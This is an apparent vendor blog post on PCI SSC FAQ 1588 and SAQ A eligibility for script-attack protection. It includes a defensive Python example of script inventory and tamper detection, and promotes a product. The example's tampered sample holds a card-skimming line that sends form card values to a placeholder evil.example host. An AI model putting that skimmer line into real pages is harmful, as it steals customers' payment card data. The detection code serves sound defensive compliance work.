On 28 February 2025, the PCI Security Standards Council (SSC) released FAQ 1588 to clarify the new eligibility criteria it introduced for SAQ A merchants earlier in January.
Under the new rules revealed in January, SAQ A merchants could mark PCI DSS requirements 6.4.3 and 11.6.1 as “Not Applicable” if they could “confirm that their site is not susceptible to attacks from scripts that could affect the merchant’s e-commerce system(s).”
However, the PCI SSC did not define what it meant by “site” or what constituted evidence that one’s site or pages were “not susceptible” to script-based attacks. FAQ 1588 answers both of those questions.
Understanding FAQ 1588
The FAQ clarifies how merchants using embedded payment forms or iframes from a third-party service provider (TPSP) or payment processor can show that their payment pages are “not susceptible” to script-based attacks, in one of two ways:
Using techniques such as, but not limited to, those detailed in PCI DSS Requirements 6.4.3 and 11.6.1 to protect the merchant’s webpage from scripts targeting account data. These techniques may be deployed by the merchant or a third party.
Or
Obtaining confirmation from the merchant’s PCI DSS compliant Third-Party Service Providers (TPSPs)/payment processor providing the embedded payment page/form(s) that, when implemented according to the TPSP’s/payment processor’s instructions, the TPSP’s/payment processor’s solution includes techniques that protect the merchant’s payment page from script attacks.
In short, FAQ 1588 states that merchants can meet the eligibility criteria if they confirm that their payment page(s) are not susceptible to script-based attacks by either:
- Deploying the security controls defined under requirements 6.4.3 and 11.6.1, or
- Obtaining confirmation from their TPSP/payment processor that the payment page(s) carrying its iframe or embedded payment form are protected from script-based attacks. That confirmation is tied to the merchant implementing the TPSP’s solution or specific techniques exactly as the TPSP instructs.
FAQ 1588 validates the recommendations we shared during our February 20th webinar. While the compliance requirements for SAQ A changed, the underlying security realities behind these requirements didn’t, and ignoring them risks costly breaches.
In a sense, the PCI SSC changed the route, but the final destination is the same, i.e., every merchant must show they’re taking the threat of script-based attacks seriously.
Option 1 - Implement Security Controls to Stop Script-Based Attacks
The first option requires merchants to implement, and be able to demonstrate, security controls on their payment pages that mitigate the risk of script-based attacks. Merchants have the option of implementing the controls defined under requirements 6.4.3 and 11.6.1.
That means, for 6.4.3, keeping an inventory of every script loaded into the consumer’s browser on the payment page with a written business justification for each, together with a method to confirm that each script is authorized and that its integrity is assured; and, for 11.6.1, deploying a change- and tamper-detection mechanism that alerts on unauthorized modification of those scripts and of security-impacting HTTP headers as received by the browser.
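As an added illustration (not DataStealth’s product code, and not anything published by the PCI SSC), the following Python sketches the two controls side by side: a script inventory with written justifications that acts as the 6.4.3 allowlist, and a baseline-and-compare check of script hashes and security-impacting headers that does the 11.6.1 job. The page HTML, script bodies, headers, and the psp.example and evil.example hosts are constructed placeholders; a real deployment would fetch the live page and each script over HTTPS, exactly as the browser would, and run the check on the schedule the requirement sets.

```python
"""Script inventory (PCI DSS 6.4.3) and change/tamper detection (11.6.1) for a
payment page. Illustration only; all data below is constructed sample data."""
import hashlib
from html.parser import HTMLParser

# HTTP headers whose change could weaken the page's protection against scripts.
SECURITY_HEADERS = ("content-security-policy", "x-frame-options",
                    "strict-transport-security")


class ScriptCollector(HTMLParser):
    """Collects every <script> on the page as (src or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._body = None  # None while outside a <script> element

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._body = ""

    def handle_data(self, data):
        if self._body is not None:
            self._body += data

    def handle_endtag(self, tag):
        if tag == "script":
            self.scripts.append((self._src, self._body.strip()))
            self._body = None


def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()


def script_fingerprints(html, bodies):
    """Map every script on the page to a SHA-256 of its content as received by
    the browser. `bodies` maps src -> fetched body (stands in for an HTTP GET);
    inline scripts are keyed by position: 'inline#0', 'inline#1', ..."""
    collector = ScriptCollector()
    collector.feed(html)
    fingerprints, inline_count = {}, 0
    for src, body in collector.scripts:
        if src:
            fingerprints[src] = sha256(bodies[src])
        else:
            fingerprints[f"inline#{inline_count}"] = sha256(body)
            inline_count += 1
    return fingerprints


def normalize(headers):
    return {k.lower(): v for k, v in headers.items()}


def build_baseline(html, bodies, headers, inventory):
    """Run after a review: refuse any script that has no written justification
    in the 6.4.3 inventory, then record approved hashes and security headers."""
    fingerprints = script_fingerprints(html, bodies)
    unjustified = sorted(set(fingerprints) - set(inventory))
    if unjustified:
        raise ValueError(f"scripts with no 6.4.3 justification: {unjustified}")
    headers = normalize(headers)
    return {"scripts": fingerprints,
            "headers": {h: headers.get(h) for h in SECURITY_HEADERS}}


def check_page(html, bodies, headers, baseline):
    """11.6.1 check: compare the live page with the baseline and report every
    unauthorized script, changed script body, missing script or changed header."""
    findings = []
    live = script_fingerprints(html, bodies)
    for key, digest in live.items():
        if key not in baseline["scripts"]:
            findings.append(f"unauthorized script added: {key}")
        elif digest != baseline["scripts"][key]:
            findings.append(f"script content changed: {key}")
    for key in baseline["scripts"]:
        if key not in live:
            findings.append(f"approved script missing: {key}")
    headers = normalize(headers)
    for h in SECURITY_HEADERS:
        if headers.get(h) != baseline["headers"][h]:
            findings.append(f"security header changed: {h}: "
                            f"{baseline['headers'][h]!r} -> {headers.get(h)!r}")
    return findings


# Constructed sample data (placeholder hosts, not real services).
PSP_JS = "https://js.psp.example/v1/checkout.js"
GOOD_PAGE = f"""<html><head><script src="{PSP_JS}"></script></head>
<body><iframe src="https://pay.psp.example/form"></iframe>
<script nonce="r4nd0m">PSP.mount('#card', {{key: 'pk_test'}});</script>
</body></html>"""
GOOD_BODIES = {PSP_JS: "window.PSP = {mount: function () {}};"}
GOOD_HEADERS = {"Content-Security-Policy":
                "script-src https://js.psp.example 'nonce-r4nd0m'",
                "X-Frame-Options": "DENY"}
INVENTORY = {PSP_JS: "TPSP loader for the hosted payment form",
             "inline#0": "mounts the TPSP iframe into the checkout page"}

# A compromised version: the TPSP loader now exfiltrates card data, a second
# skimmer script was injected into the page, and the CSP header was dropped.
SKIMMER = "https://cdn.evil.example/s.js"
TAMPERED_PAGE = GOOD_PAGE.replace("</body>", f'<script src="{SKIMMER}"></script></body>')
TAMPERED_BODIES = {PSP_JS: GOOD_BODIES[PSP_JS] +
                   "fetch('https://cdn.evil.example/c?' + document.forms[0].card.value);",
                   SKIMMER: "/* skimmer */"}
TAMPERED_HEADERS = {"X-Frame-Options": "DENY"}

if __name__ == "__main__":
    baseline = build_baseline(GOOD_PAGE, GOOD_BODIES, GOOD_HEADERS, INVENTORY)
    print("clean page:", check_page(GOOD_PAGE, GOOD_BODIES, GOOD_HEADERS, baseline))
    for finding in check_page(TAMPERED_PAGE, TAMPERED_BODIES, TAMPERED_HEADERS, baseline):
        print("ALERT:", finding)
```

Two design points matter here. The baseline refuses to be built while the page carries a script nobody has justified, which is what keeps the 6.4.3 inventory honest; and the 11.6.1 comparison hashes the script body the browser would actually receive, not just the src URL, so a third-party host serving altered content (the first tampered case above) is caught even though the page HTML itself is unchanged for that script.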
However, the PCI SSC’s wording suggests that other approaches are also acceptable, provided they demonstrate that your payment pages are protected against script-based attacks.
Regardless of the approach, the FAQ confirms PCI DSS’s strong focus on protecting payment pages against script-based attacks and urges SAQ A merchants to adopt the best solutions or approaches available to protect themselves.
A solution like DataStealth’s eSkimming Protection is an ideal fit in this context. It not only meets requirements 6.4.3 and 11.6.1 but also proactively safeguards your payment page against script-based attacks, including those employing advanced techniques and strategies.
For example, while some solutions can block some scripts from executing, DataStealth’s eSkimming Protection ensures that no unauthorized scripts ever reach the consumer’s browser. This keeps you in control of compliance and security, rather than relying on an unmanaged browser running on an unknown device and operated by a consumer you can’t control.
It operates in-line with traffic, scanning every script on the payment page to detect and block unauthorized changes, such as malicious code injections, before they can affect consumers or compromise sensitive data.
Moreover, this is simply one among many differentiating capabilities of DataStealth’s eSkimming Protection solution. Not only does it proactively protect you from script-based attacks, but it also streamlines your compliance workload by automating script authorization, script integrity checks and continuous monitoring of scripts and security-impacting HTTP headers.
Option 2 - Get a Confirmation from Your TPSP
The second option transfers the compliance burden to the TPSP/payment processors. It seems that the PCI SSC is providing this option to help smaller merchants reduce their PCI DSS compliance obligations.
The rules for this process are unclear, particularly regarding which “solutions” or “techniques” the PCI SSC considers acceptable. Note also that the FAQ ties the confirmation to the solution being implemented according to the TPSP’s instructions, so a merchant that deviates from them (for instance by adding other scripts to the payment page) should not assume the confirmation still covers it. It is also uncertain whether TPSPs will be ready or willing to provide these confirmations, since doing so could make them accountable for their customers’ compliance and security.
Currently, many TPSPs may be unprepared to offer such assurances due to the lack of clear guidelines or insufficient internal resources to manage the responsibility.
That said, service providers interested in engaging in this service can explore using DataStealth solutions, such as eSkimming Protection and others, to secure both their own and their clients’ payment environments.
How Does this Impact Merchants Interested in Shifting to SAQ A?
FAQ 1588 clarifies one key point: merchants interested in moving to SAQ A should still prioritize requirements 6.4.3 and 11.6.1. Moving from SAQ D or SAQ A-EP to SAQ A will take time, and it is a sound long-term move toward reducing your compliance burden.
Unfortunately, it can’t be done within the 16 business days left (as of publication) until the March 31st enforcement deadline. However, by meeting requirements 6.4.3 and 11.6.1 today, you will be well placed to meet your future SAQ A compliance requirements.
Next Steps
- Don’t wait for TPSPs to figure it out! Take control of your compliance today.
- If you are a SAQ D or SAQ A-EP merchant, focus on meeting requirements 6.4.3 and 11.6.1.
- Schedule a demo with DataStealth to see how eSkimming Protection can secure your payment pages.